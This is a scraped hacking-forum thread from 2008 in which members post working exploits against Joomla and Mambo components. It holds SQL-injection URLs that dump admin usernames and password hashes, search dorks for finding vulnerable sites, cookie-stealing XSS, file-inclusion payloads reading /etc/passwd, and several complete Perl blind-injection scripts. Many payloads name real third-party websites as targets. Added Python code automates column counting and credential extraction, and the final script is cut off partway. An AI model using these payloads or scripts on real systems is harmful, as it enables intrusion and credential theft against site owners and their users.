ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Web vulnerabilities (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Overview of CMS [Joomla, Mambo] vulnerabilities and those of their components (https://forum.antichat.xyz/showthread.php?t=50600)

Solide Snake 12.02.2008 22:59

Joomla Component rapidrecipe <= 1.6.5 SQL Injection

SQL Injection

Code:

after user_id or category_id add the exploit

-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*

For searching:

Code:

allinurl: "com_rapidrecipe"user_id
allinurl: "com_rapidrecipe" category_id


Joomla Component pcchess <= 0.8 Remote SQL Injection

SQL Injection

Code:

index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
For searching:

Code:

allinurl: com_pcchess "user_id"
allinurl: com_pcchess

(c)
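Both PoCs in the post above share one pattern: a numeric GET parameter is concatenated straight into the SQL string, so `-9999999 UNION SELECT ...` empties the legitimate result set and the page renders the attacker's row instead. The following Python script is an added example, not code from the post or from either component. It rebuilds the pattern against an in-memory SQLite database with constructed sample tables (`jos_users` plus a made-up `jos_recipes`, an assumption; the real component's table is not named on the page), shows why the posted payloads pad with `0,1,2,...` (a UNION only parses when both sides have the same column count), and puts the hardened handler beside the vulnerable one. The MySQL spelling from the post (`concat(username,0x3a,password)`, `/**/`, a trailing `/*`) is written in SQLite's dialect (`||` and `--`).

```python
import hashlib
import sqlite3

# Constructed stand-in for a Joomla 1.0 database; sample rows, not anything taken from a
# real site (the hashes are md5 of the sample usernames, computed here).
SAMPLE_USERS = [
    (62, "admin",  hashlib.md5(b"admin").hexdigest()),
    (63, "editor", hashlib.md5(b"editor").hexdigest()),
]


def build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE jos_users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO jos_users VALUES (?, ?, ?)", SAMPLE_USERS)
    # assumed component table, standing in for whatever rapidrecipe/pcchess really use
    con.execute("CREATE TABLE jos_recipes (id INTEGER, user_id INTEGER, title TEXT)")
    con.execute("INSERT INTO jos_recipes VALUES (1, 63, 'Borscht')")
    return con


def view_user_recipes_vulnerable(con, user_id):
    """The pattern behind the posted PoCs: the GET parameter is pasted into the query
    unquoted, so in a numeric context nothing has to be escaped to break out."""
    sql = "SELECT id, title, user_id FROM jos_recipes WHERE user_id=" + user_id
    return [tuple(row) for row in con.execute(sql)]


def view_user_recipes_fixed(con, user_id):
    """The fix: force the type (PHP intval()) and bind the value instead of concatenating."""
    uid = int(user_id)  # "-1 UNION ..." raises ValueError and never reaches the database
    return [tuple(row) for row in con.execute(
        "SELECT id, title, user_id FROM jos_recipes WHERE user_id=?", (uid,))]


def hardened_rejects(con, user_id):
    """True when the hardened handler refuses the value before any SQL runs."""
    try:
        view_user_recipes_fixed(con, user_id)
        return False
    except ValueError:
        return True


def count_columns(con, query_fn, max_cols=40):
    """Why the posted payloads pad with 0,1,2,... or NULLs: the UNION only parses when both
    SELECTs have the same width. Grow the NULL list until the query stops erroring."""
    for n in range(1, max_cols + 1):
        payload = "-1 UNION SELECT " + ",".join(["NULL"] * n) + "--"
        try:
            query_fn(con, payload)
            return n
        except sqlite3.OperationalError:  # "SELECTs ... do not have the same number of result columns"
            continue
    return None


def dump_credentials(con, query_fn, ncols, shown_col=1):
    """Put username:password into the column the page renders and pad the others.
    MySQL form from the post: concat(username,0x3a,password) ... /* ; SQLite: || and --"""
    cols = ["NULL"] * ncols
    cols[shown_col] = "username||':'||password"
    payload = "-1 UNION SELECT " + ",".join(cols) + " FROM jos_users--"
    return sorted(row[shown_col] for row in query_fn(con, payload))


if __name__ == "__main__":
    db = build_db()
    n = count_columns(db, view_user_recipes_vulnerable)
    print("query width:", n)
    print(dump_credentials(db, view_user_recipes_vulnerable, n))
    print("hardened handler rejects payload:",
          hardened_rejects(db, "-1 UNION SELECT NULL,NULL,NULL--"))
```

`count_columns` is the automated form of the `1,2,version(),4,...,36` guesswork seen later in the thread; once the width is known, the value goes into whichever column the template actually prints, which is why several posted payloads place `concat(...)` in the middle of a long list of constants.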

l-l00K 12.02.2008 23:28

Found it myself, checked it - doesn't seem to be old news.
Limbo - Lite Mambo 1.0.4
SQL injection in the downloads module, in the catid parameter; the tech-support sites are vulnerable:
Code:

http://limbo-cms.com.ru/index.php?option=downloads&catid=2700+union+select+1,concat_ws(0x3a,username,password),3+from+lc_users+--+
Code:

http://limboportal.com/index.php?option=downloads&catid=7%20and%20substring(version(),1,1)=3+--+

it's my 13.02.2008 07:48

Component Blog Calendar 1.2.4 Passive XSS

inurl: index.php?option=com_blog_calendar
Injection:
Code:

index.php?option=com_blog_calendar&year=%22onmouseover=%22javascript:alert(document.cookie);%22%3E123%3C!--
http://courier.brestnet.com/index.php?option=com_blog_calendar&year=%22onmouseover=%22javascript:alert(document.cookie);%22%3E123%3C!--

To get the alert to pop up, hover the cursor over the buggy link.

Component Board [version unknown] Local Include

inurl: index.php?option=com_board
Injection:
Code:

index.php?option=com_board&bbs_id=notice&Itemid=99999999&requiredfile=
http://eng.pharmaceutical.co.kr/index.php?option=com_board&bbs_id=notice&Itemid=99999999&requiredfile=../../../../../../../../../../../../etc/passwd

As for the Board component, I'm not sure I named the vulnerability correctly, but it works like a charm =)

(c) it's my

FraiDex 14.02.2008 10:02

Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability


Code:

index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*
(c)milw0rm.com

Solide Snake 14.02.2008 23:23

Joomla Component paxxgallery 0.2 (iid) SQL Injection

Exploit

Code:

AFTER userid ADD EXPLOIT (add the exploit after userid)

EXAMPLE=http:XXXXXX/index.php?option=com_paxxgallery&Itemid=85&gid=7&userid= EXPLOIT

EXPLOIT==

S@BUN&task=view&iid=-3333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2Cconcat(username,0x3a,password)%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users

For searching

Code:

allinurl: com_paxxgallery "iid"
allinurl: com_paxxgallery "userid"


Joomla Component MCQuiz 0.9 Final (tid) SQL Injection

Exploit

Code:

ATTACKER CAN SEE PASSWORD AND USERNAME UNDER PAGE

EXAMPLE=www.xxxxx.com/index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xxx&tid= [EXPLOIT]

EXPLOIT=1=

1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),0x3a/**/from/**/jos_users/*

EXPLOIT=2=

1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*

For searching

Code:

allinurl: com_mcquiz "tid"
allinurl: com_mcquiz


Joomla Component Quiz <= 0.81 (tid) SQL Injection

Exploit

Code:

ALL PASSWORD AND USERNAME UNDER PAGE

EXAMPLE: AFTER tid add EXPLOITS

www.xxxxxxxx.com/index.php?option=com_quiz&task=user_tst_shw&Itemid=xxx&tid= [EXPLOIT]

EXPLOIT=1=

1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/jos_users/*

EXPLOIT=2=

1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*

For searching

Code:

allinurl: com_quiz"tid"
allinurl: com_quiz

(c)


Joomla Component mediaslide (albumnum) Blind SQL Injection

Code:

#!/usr/bin/perl
#inphex
#joomla com_mediaslide blind sql injection
use LWP::UserAgent;
use LWP::Simple;
use Switch;
use Digest::MD5 qw(md5 md5_hex md5_base64);
print "usage: $0 -h host.com -p /\n";
### use Getopt::Long; ###
$column = "username";
$table  = "jos_users";
$regex  = "preview_f2";   # page marker; the script treats its absence as "condition held"
%cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-r" => "regex");
$a = 0;
# minimal option parsing: "-h value" sets $host, "-p value" sets $path, and so on
foreach (@ARGV) {
        $a++;
        while (($k, $v) = each(%cm_n_)) {
                if ($_ eq $k) {
                        ${$v} = $ARGV[$a];
                }
        }
}

$i = 48;   # character code under test; codes 48..90 cover '0'..'9', punctuation and 'A'..'Z'
$h = 1;    # position inside the value being read (MySQL SUBSTRING is 1-based)
$f = 0;
$k = 0;
### Yeah,that's it... ###
# Each pass walks the codes in increasing order and appends every hit, so one pass only
# finds characters whose code is larger than the previous hit; passes repeat until one
# adds nothing. MySQL's default collation compares case-insensitively, hence lc().
while () {
        while ($i <= 90) {
                if (check($i,$h,1) == 1) {
                        syswrite STDOUT,lc(chr($i));
                        $h++;
                        $a_chr = $a_chr.chr($i);
                }
                $i++;
        }
        push(@ffs,length($a_chr));
        # a full pass that found no new character means the value is complete
        if (@ffs >= 2 && $ffs[-1] == $ffs[-2]) {
                &check_vuln();
                exit;
        }
        $i = 48;
}
#/

### :D ###
# One request: albumnum=1 AND SUBSTRING((SELECT $column FROM $table LIMIT 0,1),$h,1)=CHAR($i)
# Returns 1 (character matched) when $regex is missing from the response, 0 otherwise.
sub check($$$)
{
        $i = shift;
        $h = shift;
        $m = shift;

        switch ($m)
        {
                case 1 { $query = "%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20LIMIT%200,1),".$h.",1)=CHAR(".$i.")"; }
        }

        $ua = LWP::UserAgent->new;
        $url = "http://".$host.$path."index.php?option=com_mediaslide&act=contact&id=1&albumnum=1".$query."";
        $response = $ua->get($url);
        $content = $response->content;
        if($content =~ /$regex/) { return 0;} else { return 1 ;}
}
#/

# Sanity check: fetch the page for "AND 1=1" and for "AND 1=0" and compare MD5s of the
# bodies; identical pages mean the condition has no effect on the output.
sub check_vuln
{
        $content  = get("http://".$host.$path."index.php?option=com_mediaslide&act=contact&id=1&albumnum=1%20AND%201=1");
        $content1 = get("http://".$host.$path."index.php?option=com_mediaslide&act=contact&id=1&albumnum=1%20AND%201=0");

        foreach $bb1 (split(/\n/,$content)) {
                $bb = $bb.$bb1;
        }

        foreach $yy1 (split(/\n/,$content1)) {
                $yy = $yy.$yy1;
        }

        $f = md5_hex($bb);
        $s = md5_hex($yy);

        if ($f eq $s) {
                print "\nprobably not vulnerable";    #could be that ads,texts etc.. change
                exit;
        } else { print "\nvulnerable..."; }
}

# milw0rm.com [2008-02-14]
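The mediaslide script above tries every code from 48 to 90 in turn and prints `lc()` because MySQL's default collation makes `=CHAR(65)` match `a` as well as `A`. The following Python script is an added example, not the post's code: it runs the same boolean-blind idea against an in-memory SQLite stand-in (a constructed sample user and an assumed `jos_mediaslide_albums` table; the component's real table is not named on the page), but reads the length first and then binary-searches each character's code point, so a 32-character hash costs about 7 requests per character instead of up to 43. SQLite's `unicode(substr(...))` plays the role of MySQL's `ASCII(SUBSTRING(...))`; comparing numbers rather than strings also sidesteps the collation problem entirely.

```python
import sqlite3

# Constructed stand-in for the target database; sample rows, not real credentials.
SAMPLE_USER = ("Admin_01", "d41d8cd98f00b204e9800998ecf8427e")


def build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE jos_users (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO jos_users VALUES (62, ?, ?)", SAMPLE_USER)
    # assumed table behind albumnum=; the PoC only shows the URL parameter
    con.execute("CREATE TABLE jos_mediaslide_albums (id INTEGER, name TEXT)")
    con.execute("INSERT INTO jos_mediaslide_albums VALUES (1, 'Holiday')")
    return con


class Oracle:
    """Stands in for index.php?option=com_mediaslide&act=contact&id=1&albumnum=1<injection>.
    The attacker learns one bit per request: does the album still render, i.e. did the
    injected AND condition hold?"""

    def __init__(self, con):
        self.con = con
        self.requests = 0

    def album_renders(self, injection):
        self.requests += 1
        sql = "SELECT name FROM jos_mediaslide_albums WHERE id=1" + injection
        return len(self.con.execute(sql).fetchall()) > 0


def blind_int(oracle, expr, lo, hi):
    """Binary-search an integer-valued SQL expression known to lie in [lo, hi]:
    ceil(log2(hi-lo+1)) requests instead of one per candidate value."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.album_renders(" AND (%s)>%d" % (expr, mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_string(oracle, subquery, max_len=64):
    """Read the length first, then each character by its code point (printable ASCII).
    MySQL: ASCII(SUBSTRING(...)); SQLite: unicode(substr(...))."""
    length = blind_int(oracle, "length((%s))" % subquery, 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        code = blind_int(oracle, "unicode(substr((%s),%d,1))" % (subquery, pos), 32, 126)
        chars.append(chr(code))
    return "".join(chars)


def dump_first_user(con):
    """Returns (username, password hash, requests used) for the first jos_users row."""
    oracle = Oracle(con)
    user = blind_string(oracle, "SELECT username FROM jos_users LIMIT 0,1")
    pw = blind_string(oracle, "SELECT password FROM jos_users LIMIT 0,1")
    return user, pw, oracle.requests


if __name__ == "__main__":
    print(dump_first_user(build_db()))
```

The request counter is the point of the exercise: 8 + 32 characters come out in under 300 requests, which is also the budget a WAF or rate limiter sees, so on a real engagement the same loop is what you throttle or randomise rather than the payload itself.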


FraiDex 15.02.2008 22:10

Mambo Component Quran <= 1.1 (surano) SQL Injection Vulnerability

Mambo
Code:

/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password),3,4,5+from+mos_users+limit+0,20--
Joomla
Code:

/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password),3,4,5+from+jos_users+limit+0,20--
allinurl:"com_quran"
inurl:"/index.php?option=com_quran"


(c)milw0rm.com

gibson 17.02.2008 03:30

Mambo Component Ricette 1.0 Remote SQL Injection Vulnerability

EXPLOIT
Quote:

index.php?option=com_ricette&Itemid=S@BUN&func=detail&id=-9999999/**/union/**/select/**/0,0,%20%20%200x3a,111,222,333,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,concat(username,0x3a,password)/**/from/**/mos_users/
PS
Quote:

allinurl: com_ricette
Quote:

allinurl: "com_ricette"id
Author: S@BUN http://milw0rm.com/exploits/5133

gibson 17.02.2008 03:32

joomla SQL Injection(com_jooget)


EXPLOIT :
Quote:

index.php?option=com_jooget&Itemid=S@BUN&task=detail&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*
PS
Quote:

allinurl: id "com_jooget"
Quote:

allinurl: detail "com_jooget"
Quote:

allinurl: "com_jooget"

Author: S@BUN http://milw0rm.com/exploits/5132

it's my 19.02.2008 08:36

Component Portfolio 1.0 SQL Injection

inurl: index.php?option=com_portfolio
Injection:
Code:

index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*
http://www.inta.org/index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*

(c) it's my http://milw0rm.com/exploits/5139

Joomla Component Artist

Code:

http://www.tremplin-avenir.com/index.php?option=com_artist&task=view_artist_file&artistId=-1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16+from+jos_users/*
http://www.dymok.net/index.php?option=com_artist&task=show_artist&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16+from+jos_users/*
http://www.aarte.net/index.php?option=com_artist&idgalery=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9+from+jos_users/*

Three different vulnerable parameters

Solide Snake 19.02.2008 18:29

Joomla Component com_pccookbook (user_id) SQL Injection

SQL Injection

Code:

index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
For searching

Code:

allinurl: com_pccookbook
allinurl: viewuserrecipes
allinurl: "com_pccookbook"user_id


Joomla Component com_clasifier (cat_id) SQL Injection

SQL Injection

Code:

index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
For searching

Code:

allinurl: com_clasifier
allinurl: com_clasifier cat_id

(c)

fobofob 20.02.2008 16:25

Component com_philaform

vulnerable parameter form_id

but it doesn't work everywhere; I haven't figured out why

example of a vulnerable site:

code:

http://www.nextprom.ru/index.php?option=com_philaform&Itemid=5&form_id=1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36#&Itemid=5

it's my 26.02.2008 13:55

Component EasyBook 1.1 Active XSS

inurl: index.php?option=com_easybook
Injection:
Code:

When adding a message, the "Your Homepage:" field is vulnerable. Enter: http://www.com/" onmouseover=javascript:alert(/XSS/);> and submit the message.
Example: http://demo.easy-joomla.org/index.php?option=com_easybook&Itemid=5
Nickname Hi!, hover the cursor over the link


it's my 28.02.2008 07:47

Component Simpleboard 1.0.3 (catid) SQL Injection

inurl: index.php?option=com_simpleboard
Injection:
Code:

index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*
http://www.uvageneration.com/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*

(c) it's my, Scipio, xcedz http://milw0rm.com/exploits/5195

~!DoK_tOR!~ 06.03.2008 18:44

Mambo Component com_Musica (id) Remote SQL Injection Vulnerability

SQL Injection

Code:

index.php?option=com_musica&Itemid=172&tasko=viewo&task=view2&id=-4214/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0+from%2F%2A%2A%2Fmos_users/*

milw0rm

~!DoK_tOR!~ 10.03.2008 20:24

Mambo Component eWriting 1.2.1 (cat) SQL Injection Vulnerability

SQL Injection


Joomla!

Code:

/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--
Mambo

Code:

/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+mos_users--

milw0rm

~!DoK_tOR!~ 11.03.2008 19:26

Joomla Component ProductShowcase <= 1.5 SQL Injection Vulnerability

SQL Injection

Code:

index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
milw0rm

ZAMUT 16.03.2008 00:10

Joomla 1.5.1

Active XSS

Edit Your Details -> Your Name: [XSS]

XSS
(Administrator rights)
Active:
Article: [ New ] -> Title: [XSS]
Passive:
Filter:[XSS]
Code:

/administrator/index.php?option=com_menus&task=view&menutype=[XSS]
ZAMUT (c)

iddqd 18.03.2008 21:17

Joomla components com_guide "category" Remote SQL Injection

PoC:
Code:

index.php?option=com_guide&category=-999999/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

© The-0utl4w

~!DoK_tOR!~ 20.03.2008 21:41

Joomla Component Datsogallery 1.3.1 Remote SQL Injection Vulnerability

SQL Injection

index.php?option=com_datsogallery&func=detail&id=' Sql

Code:

union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8,9,0,1,2,3,4,5+from+jos_users/*
milw0rm

~!DoK_tOR!~ 28.03.2008 16:05

Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability

SQL Injection

http://[target]/index.php?option=com_myalbum&album=[SQL]

Code:

-1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/*

Joomla Component alphacontent <= 2.5.8 (id) SQL Injection Vulnerability

SQL Injection

Code:

index.php?option=com_alphacontent&section=6&cat=15&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*
DORK:

inurl: "com_alphacontent"
"AlphaContent 2.5.8 © 2005-2008 - visualclinic.fr"


milw0rm

z01b 03.04.2008 01:04

Online FlashQuiz 1.0.2 Remote File Inclusion Vulnerability

Developer site: www.elearningforce.biz

Exploit: http://localhost/path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=[code]



(c) NoGe

иц май 15.04.2008 12:12

Joomla passive XSS in the Traxartist component
Vulnerability:
index.php?option=com_traxartist&task=playSongex&id=1">[xss]
Example:
Code:

http://www.xclusivetrax.com/index.php?option=com_traxartist&task=playSongex&id=1"><script>alert(document.cookie)</script>
found by it's my

Ded MustD!e 24.04.2008 14:39

Joomla Component FlippingBook 1.0.4 SQL Injection

DORK: inurl:com_flippingbook
Exploit:
Code:

/index.php?option=com_flippingbook&Itemid=28&book_id=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*
(c)cO2
milw0rm.com

Joomla Component Filiale v. 1.0.4 SQL Injection

DORK: inurl:com_filiale
Exploit:
Code:

/index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10,11+from+jos_users
(c)Str0xo
milw0rm.com

Joomla Component Profiler <= 1.0.1 Blind SQL Injection

DORK: allinurl:com_comprofiler
Exploit:
Code:

/index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
(c)$hur!k'n
milw0rm.com

ZAMUT 27.04.2008 19:30

Joomla Component PaxxGallery Blind SQL Injection Exploit
"more than 1 row"

Vuln code:
PHP code:

.....
global $database;
$id  = $_POST["id"];
$gid = $_POST["gid"];
if (isset($id)) {
.....

Exploit:
Code:

#!/usr/bin/perl
use strict;
use LWP::Simple;
print "-+--[ Joomla Component PaxxGallery Blind SQL Injection Exploit ]--+-\n";
print "-+--                \"more than 1 row\"                          --+-\n";
print "-+--                                                            --+-\n";
print "-+--            Author: ZAMUT                                  --+-\n";
print "-+--            Vuln: gid=                                      --+-\n";
print "-+--            Dork: option=com_paxxgallery                    --+-\n";

# Example:
# Url_Part_1: http://www.morganomega.com/index.php?option=com_paxxgallery&Itemid=46&task=view&gid=7
# Url_Part_2: &iid=34

print "Url_Part_1:" ;
chomp(my $ur1=<STDIN>);
print "Url_Part_2:";
chomp(my $ur2=<STDIN>);
my $n=48;          # candidate character code: '0'..'9' (48..57), then 'A' (65) upwards
my $i=1;           # position in the 32-character hash; id=62 is the default Joomla 1.0 admin
my $log= 1;
my ($content,$result) = ("","");
my $request = 0;
# Oracle: when the guess is right, IF() yields the password column, LENGTH(...)>4 holds
# for every user row and the scalar subquery returns several rows, so MySQL answers
# "Subquery returns more than 1 row". When it is wrong, IF() yields the id column,
# LENGTH(id)>4 matches nothing and the page renders normally.
while($log)
{
        $content = get($ur1.'+and+1=(select+1+from+jos_users+where+length(if(ascii(upper(substring((select+password+from+jos_users+where+id=62),'.$i.',1)))='.$n.',password,id))>4)/*'.$ur2);
        if($content =~ /Subquery returns more than 1 row/) {$result.=chr($n); $n=47; $i++;}   # hit: move to the next position
        elsif($i==33 || $content =~ /doesn\'t exist/) {$log = 0}   # all 32 characters read, or the table prefix is not jos_
        else {$n++; if($n==58){$n=65} }   # jump from '9' straight to 'A'
        $request++;
}
print "Administrator hash: ".$result."\n";
print "REQUEST: ".$request;

Dork: option=com_paxxgallery


ZAMUT (c)

~!DoK_tOR!~ 02.05.2008 17:10

Joomla Component Webhosting (catid) Blind SQL Injection Exploit

Exploit:

Code:

#!/usr/bin/perl
#eSploit Framework - Inphex
use Digest::MD5 qw(md5 md5_hex md5_base64);
use LWP::UserAgent;
use HTTP::Cookies;
use Switch;
$host_ = shift;
$path_ = shift;
$id_ = shift;
$non_find = shift; #choose anything thats inside the article of id
$column = "username"; #change if needet
$table = "jos_users"; #change if needet
$info{'info'} = {
 "author" => ["cO2,Inphex"],
 "name" => ["Joomla com_webhosting Blind SQL Injection"],
 "version" => [],
 "description" => ["This script will exploit a Blind SQL Injection Vulnerability in Joomla com_webhosting"],
 "options" =>
 {
  "agent" => "",
  "proxy" => "",
  "default_headers" => [
  ["key","value"]],
  "timeout" => 2,
  "cookie" =>   
  {
  "cookie" => ["key=value"],
  },
 },
 "sending_options" =>
 {
  "host" => $host_,
  "path" => $path_."index.php",
      "port" => 80,               
  "method_a" => "SQL_INJECTION_BLIND",
  "attack" =>
  {
    "option" => ["get","option","com_webhosting"],
    "catid" => ["get","catid","".$id_."%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20LIMIT%200,1),\$h,1)=CHAR(\$i)"],
    "regex" => [[$non_find]],
 
  },
 },
};
&start($info{'info'},222);
open FH,">>ok.html";
print FH $return{222}{'content'};
sub start
{
 $a_ = shift;
 $id = shift;
 $get_dA = get_d_p_s("get");
 $post_dA = get_d_p_s("post");
 my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);
 my $jj = 1;
 my $ii = 48;
    my $hh = 1;
 my $ppp = 0;
 my $s = shift;
 my $a = "";
 my $res_p = "";
 my $h = "";
 ($h_host_h_xdsjaop,$h_path_h_xdsjaop,$h_port_h_xdsjaop,$method_m) = ($a_->{'sending_options'}{'host'},$a_->{'sending_options'}{'path'},$a_->{'sending_options'}{'port'},$a_->{'sending_options'}{'method_a'});
 $ua = LWP::UserAgent->new;
 $ua->timeout($a_->{'options'}{'timeout'});
 if ($a_->{'options'}{'proxy'}) {
    $ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});
 }
 $agent = $a_->{'options'}{'agent'} || "Mozilla/5.0";
 $ua->agent($agent);
 {                                               
  while (($k,$v) = each(%{$a_}))
  {
  if ($k ne "options" && $k ne "sending_options")
    {
    foreach $r (@{$a_->{$k}})
    {
    if ($a_->{$k}[0])
      {
      print $k.":".$a_->{$k}[0]."\n";
      }
    }
    }
  }

  foreach $j (@{$a_->{'options'}{'default_headers'}})
  { 
  $ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);
  $m++;
  }
  if ($a_->{'options'}{'cookie'}{'cookie'}[0])
  {       
  $ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);
  }
 
 }
 switch ($method_m)     
 {
  case "attack" { &attack();}
  case "SQL_INJECTION_BLIND" { &sql_injection_blind();}
  case "REMOTE_COMMAND_EXECUTION" { &attack();}
  case "REMOTE_CODE_EXECUTION" {&attack();}
  case "REMOTE_FILE_INCLUSION" { &attack();}
  case "LOCAL_FILE_INCLUSION" { &attack(); }
  else { &attack(); }
 }

 sub attack
 {
 
  if ($post_dA eq "") {
  $method = "get";
  } elsif ($post_dA ne "")
  {
  $method = "post";
  }
  if ($method eq "get") {
  $res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA);
  ${$a_}{$id}{'content'} = $res_p;
  foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
    {
    $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
   
    while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
    {
    if (${$jj} ne "")
      {
      ${$a_}{$id}{'regex'}[$h] = ${$jj};
      }
      $jj++;
    }
    $h++;
    }
  } elsif ($method eq "post")
  {
  $res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA);
 
  ${$a_}{$id}{'content'} = $res_p;
  foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
    {
    $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
    while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
    {
    if (${$jj} ne "")
      {
      ${$a_}{$id}{'regex'}[$h] = ${$jj};
      }
      $jj++;
    }
    $h++;
    }
  }
 }
 sub sql_injection_blind
 {
  syswrite STDOUT,$column.":";
  while ()
  {
  while ($ii <= 90)
    {
    if(check($ii,$hh) == 1)
    {
    syswrite STDOUT,lc(chr($ii));
    $hh++;
    $chr = $chr.chr($ii);
    }
    $ii++;
  }
  push(@ffs,length($chr));
  if (@ffs >= 2 && $ffs[-1] == $ffs[-2])   # a full pass found no new character: done
    {
    print "\nFinished/Error\n";
    exit;
    }
    $ii = 48;
  }
 }
 sub check($$)
 {
  $ii = shift;
  $hh = shift;
  if (get_d_p_s("post") ne "")
  {
  $method = "post";
  } else { $method = "get";}
  if ($method eq "get")
  {
  $ppp++;
  $query = modify($get_dA,$ii,$hh);
  $res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);
  foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
    {
    if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
    {
    return 1;
    }
    else
    {
      return 0;
    }
    $h++;
  }
  } elsif ($method eq "post")
  {
  $ppp++;
  $query_g = modify($get_dA,$ii,$hh);
  $query_p = modify($post_dA,$ii,$hh);
 
